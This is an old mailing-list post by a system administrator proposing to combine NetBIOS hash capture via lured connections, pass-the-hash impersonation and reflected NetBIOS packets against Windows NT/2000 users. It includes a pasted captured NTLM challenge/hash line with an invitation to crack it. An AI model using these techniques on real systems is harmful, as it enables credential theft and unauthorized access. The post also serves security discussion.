Hash Harvesting

[davel () ECST CSUCHICO EDU]

First a disclaimer, I am a mere sys admin mortal, so if I say something 
stupid here, please forgive me. Also, please correct me so I can become 
less ignorant.

I'm not going to suggest anything new here, but I am going to look at 
combing three different "attacks" into one. If they can be combined, I 
think they will be extremely potent.

1. It is possible to obtain the IP Address, User Name, Challenge, NT Hash 
and LanMan Hash from a user situated behind a firewall. If I were to entice 
a user at a Windows NT/2000 computer to attempt to connect to my NT/2000 
computer they will pass me this information. All I need for this to happen 
is for outbound NetBIOS traffic to be allowed at their firewall. I propose 
that is far more common than it should be.

I am now going to paste in a live capture, where I have changed the User 
Name and Domain, but left the hashes and the challenge intact. Copy and 
paste this into a text file and crack it. If your dictionary file is any 
good it should take about 2 seconds (or less).

<paste>

DOMAIN\USER:3:0d7a5a3319525f12:26cf3ed46c3d64b679528bf96f635a74b0c04e2f39d3b926:000000000000000000000000000000000000000000000000
DOMAIN\USER:3:0d7a5a3319525f12:26cf3ed46c3d64b679528bf96f635a74b0c04e2f39d3b926:000000000000000000000000000000000000000000000000

</paste>

I can think of a number of ways to get people to do this without initially 
being aware that they are doing so. Simply crafting a link in a website is one.

2. It is possible to modify the Windows NT logon credentials, which will 
allow you to use a hash (without cracking it) to impersonate a legitimate 
user of a resource. See Hernán Ochoa 's paper at 
http://www.core-sdi.com/papers/nt_cred.htm for the details. For this to 
work the computer you're are attacking must allow LanMan hashes. I don't 
know of many pure NT networks, so I suspect finding computers that accept 
LanMan hashes will be even easier than finding firewalls that allow 
outbound NetBIOS traffic.

3. This one is stretching a bit, but what the heck... Robert Graham 
(http://www.robertgraham.com/) has written a program that he calls soibten 
which "will reflect … NetBIOS scans back [to] the sender". If there was 
some way to expand this so that instead of reflecting a scan back to the 
sender, that we instead were able to send back packets crafted in the 
manner covered by Hernán Ochoa, could we then access that machine merely 
because they tried to access us?

I've asked around about a little bit, and one response I have received 
doesn't seem to match what I am seeing... This is what I told by an 
individual whose knowledge and ability I respect:

<paste>

One big mistake in your scenario is expecting the hashes to be sent to you
- that's not how it works - conversation goes like this:

Client to server - I want to log onto resource, my name is -
Server to client - OK, here's your challenge
Client to Server - here's your challenge encrypted with my hash as a key

</paste>

I can't reconcile that with the L0phtcrack SMB capture included in this 
message.

Even if these separate "attacks" can't be combined, the first item I 
mentioned should be a great way to get many, many hashes. I've been told 
that Hobbit may have proposed this a number of years back. If that is the 
case, can someone please point me to a URL so can see read that paper?

Again, just a lowly admin here folks, anything you can provide to make we 
wiser is always appreciated.